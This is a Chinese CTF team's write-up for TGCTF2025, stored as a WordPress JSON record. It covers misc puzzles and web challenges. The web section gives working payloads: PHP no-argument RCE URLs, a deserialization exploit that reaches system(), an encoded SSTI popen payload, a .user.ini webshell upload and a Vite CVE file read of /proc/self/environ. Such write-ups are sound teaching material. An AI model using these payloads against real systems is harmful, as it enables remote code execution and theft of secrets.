{"id":149,"date":"2025-04-14T21:58:55","date_gmt":"2025-04-14T13:58:55","guid":{"rendered":"https:\/\/www.hurkin.top\/?p=149"},"modified":"2025-04-17T00:33:33","modified_gmt":"2025-04-16T16:33:33","slug":"escape-in-the-sun-tgctf2025-write-up","status":"publish","type":"post","link":"https:\/\/www.hurkin.top\/index.php\/2025\/escape-in-the-sun-tgctf2025-write-up\/","title":{"rendered":"Escape in the sun TGCTF2025 Write UP"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">\u961f\u4f0d\u540d Escape in the sun \u6392\u540d 10<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u611f\u8c22\u6bcf\u4e00\u4f4d\u961f\u53cb \u90fd\u5f88\u5f3a \u819c\u62dc\u67ef\u270c\ufe0f<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"528\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638511-e857e215e804bdc97fd02c703bf337c-1024x528.png\" alt=\"\" class=\"wp-image-150\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638511-e857e215e804bdc97fd02c703bf337c-1024x528.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638511-e857e215e804bdc97fd02c703bf337c-300x155.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638511-e857e215e804bdc97fd02c703bf337c-768x396.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638511-e857e215e804bdc97fd02c703bf337c-1536x792.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638511-e857e215e804bdc97fd02c703bf337c.png 1954w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Misc<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">next is the end(\u4e00\u8840)<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">010\u6253\u5f00\u770b\u8def\u5f84\uff0c\u76f4\u63a5\u590d\u5236\u8fc7\u53bb\u76f4\u63a5\u6253\u5f00<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"457\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638536-\u56fe\u7247-1024x457.png\" alt=\"\" class=\"wp-image-151\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638536-\u56fe\u7247-1024x457.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638536-\u56fe\u7247-300x134.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638536-\u56fe\u7247-768x343.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638536-\u56fe\u7247-1536x685.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638536-\u56fe\u7247.png 1621w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">where it is(osint)\uff08\u4e8c\u8840\uff09<\/h3>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"441\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638541-\u56fe\u7247-1024x441.png\" alt=\"\" class=\"wp-image-152\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638541-\u56fe\u7247-1024x441.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638541-\u56fe\u7247-300x129.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638541-\u56fe\u7247-768x331.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638541-\u56fe\u7247-1536x662.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638541-\u56fe\u7247.png 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u76f4\u63a5\u8c37\u6b4c\u8bc6\u56fe\u53bb\u770b\uff0c\u4e00\u641c\u5373\u6709<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u8fd9\u662f\u5565o_o<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5148\u7ed9\u5206\u5e27\uff0c\u7136\u540e\u62fc\u4e00\u4e2a\u4e8c\u7ef4\u7801\uff0c\u4fee\u4e00\u4e0b<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">time is your fortune ,efficiency is your life<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u60f3\u5230\u65f6\u95f4\u8f74\u9690\u5199<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"912\" height=\"495\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638548-\u56fe\u7247.png\" alt=\"\" class=\"wp-image-153\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638548-\u56fe\u7247.png 912w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638548-\u56fe\u7247-300x163.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638548-\u56fe\u7247-768x417.png 768w\" sizes=\"auto, (max-width: 912px) 100vw, 912px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u5c06\u8fd9\u4e9b\u6570\u5b57\u8f6c\u6362\u4e3a\u5bf9\u5e94\u7684 ASCII \u5b57\u7b26\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">TGCTF{You_caugth_up_with_time!}<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">TeamGipsy&amp;ctfer<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e5f\u662f\u6253\u4e86\u975e\u9884\u671f\u554a\u54c8\u54c8<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"282\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638554-\u56fe\u7247-1024x282.png\" alt=\"\" class=\"wp-image-154\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638554-\u56fe\u7247-1024x282.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638554-\u56fe\u7247-300x83.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638554-\u56fe\u7247-768x211.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638554-\u56fe\u7247-1536x422.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638554-\u56fe\u7247.png 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u91cc\u6709\u4e2a\u5c0f\u77e5\u8bc6\u70b9\uff0cmysql\u57288.0\u7248\u672c\u4ee5\u4e0b\uff0cibd\u53ef\u4ee5\u76f4\u63a5\u6062\u590d\u5176\u4e2d\u5185\u5bb9\uff0c\u8fd9\u91cc\u7684\u7248\u672c\u662f3.8<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ef\u4ee5\u7528ibd2sql\u6765\u6062\u590d\u6570\u636e<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"158\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638558-\u56fe\u7247-1024x158.png\" alt=\"\" class=\"wp-image-155\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638558-\u56fe\u7247-1024x158.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638558-\u56fe\u7247-300x46.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638558-\u56fe\u7247-768x118.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638558-\u56fe\u7247.png 1144w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\u4f60\u80fd\u53d1\u73b0\u56fe\u4e2d\u7684\u79d8\u5bc6\u5417\uff1f<\/h3>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"150\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638563-\u56fe\u7247-1024x150.png\" alt=\"\" class=\"wp-image-156\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638563-\u56fe\u7247-1024x150.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638563-\u56fe\u7247-300x44.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638563-\u56fe\u7247-768x112.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638563-\u56fe\u7247-1536x225.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638563-\u56fe\u7247.png 1625w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u7b2c\u4e00\u5c42\u7684\u5bc6\u7801\u7528Zsteg\u770b<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7b2c\u4e8c\u5c42\u5728To not immerse yourself in this novel is to forfeit a constellation of human truths waiting to illuminate your sou1.png\u4e2d\u6709flag2\uff0c\u6587\u4ef6\u5c3e\u6709base64\uff0c\u4f46\u611f\u89c9\u6ca1\u4ec0\u4e48\u7528\u3002final_challenge2.png\u4e2d\u6709\u4e2a\u7279\u522b\u5927\u7684IDAT\u5757\uff0c\u63d0\u53d6\u51fa\u6765\uff0c\u52a0\u4e2a\u6587\u4ef6\u5934\u6587\u4ef6\u5c3e<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"210\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638625-\u56fe\u7247-1024x210.png\" alt=\"\" class=\"wp-image-157\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638625-\u56fe\u7247-1024x210.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638625-\u56fe\u7247-300x62.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638625-\u56fe\u7247-768x158.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638625-\u56fe\u7247.png 1277w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">flag{you_are_so_attentive_and_conscientious}<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">ez_zip<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5148\u7206\u7834\u51fa\u6765\u5bc6\u780120250412<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540esh512.txt,End.zip\u4e2d\u4e5f\u6709\u8fd9\u4e2a\u6587\u4ef6<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u628ash512.txt\u8fdb\u884csh512\u52a0\u5bc6\uff0c\u7136\u540e\u8fdb\u884c\u660e\u6587\u653b\u51fbEnd.zip\uff08\u4e0d\u77e5\u9053\u4ec0\u4e48\u95ee\u9898\uff0c\u8981\u5148\u628ash512\u538b\u7f29\u4e86\u624d\u80fd\u7206\uff09<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5bc6\u94a5[ b39bc130 8183a9f1 d5381ad8 ]<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u51fa\u6765\u4e00\u4e2aflag\u6587\u4ef6\u5939\uff0c\u52a0\u4e00\u4e2a789C\u7684Zilb\u5934\uff0c\u53bb\u89e3\u5185\u5bb9\u90e8\u5206\u5c31\u884c<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"350\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638633-\u56fe\u7247-1024x350.png\" alt=\"\" class=\"wp-image-158\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638633-\u56fe\u7247-1024x350.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638633-\u56fe\u7247-300x102.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638633-\u56fe\u7247-768x262.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638633-\u56fe\u7247-1536x524.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638633-\u56fe\u7247.png 1538w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">TGCTF{Warrior_You_have_defeated_the_giant_dragon!}<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u4f60\u7684\u8fd0\u6c14\u662f\u597d\u662f\u574f\uff1f<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">114514<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Web<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">AAA\u5077\u6e21\u9634\u5e73<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u65e0\u53c2rce<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">http:\/\/node1.tgctf.woooo.tech:32357\/?tgctf2025=var_dump(scandir(dirname(dirname(dirname(getcwd())))));<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"435\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638641-\u56fe\u7247-1024x435.png\" alt=\"\" class=\"wp-image-159\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638641-\u56fe\u7247-1024x435.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638641-\u56fe\u7247-300x127.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638641-\u56fe\u7247-768x326.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638641-\u56fe\u7247-1536x652.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638641-\u56fe\u7247.png 1918w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ef\u77e5\u7d22\u5f15\u4e3a5. \u7528array_rand \u770b\u8138<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">http:\/\/node1.tgctf.woooo.tech:32357\/?tgctf2025=highlight_file(array_rand(array_flip(scandir(dirname(chdir(dirname(dirname(dirname(getcwd())))))))));<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"547\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638646-\u56fe\u7247-1024x547.png\" alt=\"\" class=\"wp-image-160\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638646-\u56fe\u7247-1024x547.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638646-\u56fe\u7247-300x160.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638646-\u56fe\u7247-768x410.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638646-\u56fe\u7247.png 1459w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\u706b\u773c\u8fa9\u9b51\u9b45<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u6ca1\u4fe1\u606f\uff0c\u5148\u6253robots.txt<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"484\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638653-\u56fe\u7247-1024x484.png\" alt=\"\" class=\"wp-image-161\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638653-\u56fe\u7247-1024x484.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638653-\u56fe\u7247-300x142.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638653-\u56fe\u7247-768x363.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638653-\u56fe\u7247-1536x726.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638653-\u56fe\u7247.png 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u7b2c\u4e8c\u4e2a\u5c31\u884c\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"489\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638656-\u56fe\u7247-1024x489.png\" alt=\"\" class=\"wp-image-162\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638656-\u56fe\u7247-1024x489.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638656-\u56fe\u7247-300x143.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638656-\u56fe\u7247-768x367.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638656-\u56fe\u7247-1536x734.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638656-\u56fe\u7247.png 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\u4ec0\u4e48\u6587\u4ef6\u4e0a\u4f20<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">1.\u67e5\u770brobots.txt\u8def\u7531\u53d1\u73b0\u6709class.php<\/p>\n\n\n\n<p class=\"wp-block-paragraph\" id=\"u158ec035\">2.\u8bbf\u95eeclass.php\u53d1\u73b0\u662f\u9053\u53cd\u5e8f\u5217\u5316\uff0c\u6211\u4eec\u5229\u7528\u7684\u662fpost\u4f20\u53c2\u7684wow<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>yesterday<\/code>\u5bf9\u8c61\u7684<code>study<\/code>\u5c5e\u6027\u8bbe\u7f6e\u4e3a<code>today<\/code>\u5b9e\u4f8b\u3002<\/li>\n\n\n\n<li><code>today<\/code>\u5bf9\u8c61\u7684<code>doing<\/code>\u5c5e\u6027\u8bbe\u7f6e\u4e3a<code>future<\/code>\u5b9e\u4f8b\u3002<\/li>\n\n\n\n<li>\u5f53<code>yesterday<\/code>\u5bf9\u8c61\u88ab\u9500\u6bc1\u65f6\uff0c\u89e6\u53d1<code>__destruct<\/code>\uff0c\u8c03\u7528<code>study->hard()<\/code>\uff0c\u4ece\u800c\u89e6\u53d1<code>today<\/code>\u7684<code>__call<\/code>\u65b9\u6cd5\u3002<\/li>\n\n\n\n<li>\u5728<code>today<\/code>\u7684<code>__call<\/code>\u65b9\u6cd5\u4e2d\uff0c\u68c0\u67e5<code>$this->doing<\/code>\u7684MD5\u65f6\uff0c\u7531\u4e8e<code>doing<\/code>\u662f<code>future<\/code>\u5b9e\u4f8b\uff0cPHP\u4f1a\u5c06\u5176\u8f6c\u6362\u4e3a\u5b57\u7b26\u4e32\uff0c\u89e6\u53d1<code>future<\/code>\u7684<code>__toString<\/code>\u65b9\u6cd5\uff0c\u6267\u884c<code>system($_POST[\"wow\"])<\/code>\u3002<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">exp:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>  class yesterday {<br>  public $learn;<br>public $study;<br>}<br>class today {<br>  public $doing;<br>}<br>class future {}<br><br>$future = new future();<br>$today = new today();<br>$today-&gt;doing = $future;<br>$y = new yesterday();<br>$y-&gt;study = $today;<br><br>$serialized = serialize($y);<br>$encoded = $serialized;<br>for ($i = 0; $i &lt; 5; $i++) {<br>  $encoded = base64_encode($encoded);<br>}<br>echo \"Payload: \".$encoded.\"aaaa\"; \/\/ \u6dfb\u52a0\u56db\u4e2a\u5b57\u7b26\uff0c\u5982aaaa<br>?&gt;<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u6700\u540e\u52a0\u56db\u4e2aaaaa\u662f\u4e3a\u4e86\u786e\u4fdd\u6587\u4ef6\u4e0d\u5b58\u5728\uff08\u5b9e\u9645\u6d4b\u8bd5\u53d1\u73b0\u53ef\u4ee5\u4e0d\u7528\u52a0\uff09<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"550\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638666-\u56fe\u7247-1024x550.png\" alt=\"\" class=\"wp-image-163\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638666-\u56fe\u7247-1024x550.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638666-\u56fe\u7247-300x161.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638666-\u56fe\u7247-768x413.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638666-\u56fe\u7247-1536x826.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638666-\u56fe\u7247.png 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\u76f4\u9762\u5929\u547d<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u67e5\u770b\u6e90\u7801\u627e\u5230hint\uff0c\u8ba9\u6211\u4eec\u53bb\u4e00\u4e2a\u56db\u5c0f\u5199\u5b57\u6bcd\u8def\u7531\uff0c\u7206\u7834\u53d1\u73b0\u662f\/aazz<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fdb\u5165\u540e\u53d1\u73b0\u6e90\u7801\u63d0\u793a\u53ef\u4ee5\u4f20\u53c2\uff0c\u5bfb\u627e\u53d1\u73b0\u662f?filename=<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"550\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638673-\u56fe\u7247-1024x550.png\" alt=\"\" class=\"wp-image-164\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638673-\u56fe\u7247-1024x550.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638673-\u56fe\u7247-300x161.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638673-\u56fe\u7247-768x413.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638673-\u56fe\u7247-1536x826.png 1536w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638673-\u56fe\u7247.png 1920w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\u5929\u547d\u4eba\uff08\u590d\u4ec7\uff09<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">ssti\u7f16\u7801\u7ed5\u8fc7<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">payload<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\u5929\u547d''[\"\\x5f\\x5f\\x63\\x6c\\x61\\x73\\x73\\x5f\\x5f\"][\"\\x5f\\x5f\\x62\\x61\\x73\\x65\\x73\\x5f\\x5f\"][0][\"\\x5f\\x5f\\x73\\x75\\x62\\x63\\x6c\\x61\\x73\\x73\\x65\\x73\\x5f\\x5f\"]()[132][\"\\x5f\\x5f\\x69\\x6e\\x69\\x74\\x5f\\x5f\"][\"\\x5f\\x5f\\x67\\x6c\\x6f\\x62\\x61\\x6c\\x73\\x5f\\x5f\"]['\\x70\\x6f\\x70\\x65\\x6e']('cat \/tgffff11111aaaagggggggg')['\\x72\\x65\\x61\\x64']()\u96be\u8fdd<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">(ez)upload<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u7528\u7528upload\u76ee\u5f55\u7a7f\u8d8a\u4f20\u4e2a.user.ini\u4e0a\u53bb\uff0c\u7136\u540e\u518d\u4f20\u4e2a1.png\u3002\u5c31\u662f\u628a1.png\u7684\u6587\u4ef6\u5185\u5bb9\u52a0\u5230php\u6587\u4ef6\u5934\u3002\u8681\u5251\u8fde\u770b\u4e00\u4e0b\u73af\u5883\u53d8\u91cf\u5c31\u884c<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"375\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638682-\u56fe\u7247-1024x375.png\" alt=\"\" class=\"wp-image-165\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638682-\u56fe\u7247-1024x375.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638682-\u56fe\u7247-300x110.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638682-\u56fe\u7247-768x281.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638682-\u56fe\u7247.png 1422w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"418\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638686-\u56fe\u7247-1024x418.png\" alt=\"\" class=\"wp-image-166\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638686-\u56fe\u7247-1024x418.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638686-\u56fe\u7247-300x122.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638686-\u56fe\u7247-768x313.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638686-\u56fe\u7247.png 1398w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"691\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638690-\u56fe\u7247-1024x691.png\" alt=\"\" class=\"wp-image-167\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638690-\u56fe\u7247-1024x691.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638690-\u56fe\u7247-300x202.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638690-\u56fe\u7247-768x518.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638690-\u56fe\u7247.png 1284w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\u524d\u7aefGAME<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u53c2\u8003CVE-2025-31486 Vite\u5f00\u53d1\u670d\u52a1\u5668\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\u590d\u73b0<a href=\"https:\/\/chenchena.blog.csdn.net\/article\/details\/147150357\" target=\"_blank\"  rel=\"nofollow\" >https:\/\/chenchena.blog.csdn.net\/article\/details\/147150357<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u76f4\u63a5\u975e\u9884\u671f\u6253\u73af\u5883\u53d8\u91cf<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\/proc\/self\/environ?.svg?.wasm?init<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"397\" src=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638699-\u56fe\u7247-1024x397.png\" alt=\"\" class=\"wp-image-168\" srcset=\"https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638699-\u56fe\u7247-1024x397.png 1024w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638699-\u56fe\u7247-300x116.png 300w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638699-\u56fe\u7247-768x298.png 768w, https:\/\/www.hurkin.top\/wp-content\/uploads\/2025\/04\/1744638699-\u56fe\u7247-1536x595.png 1536w, 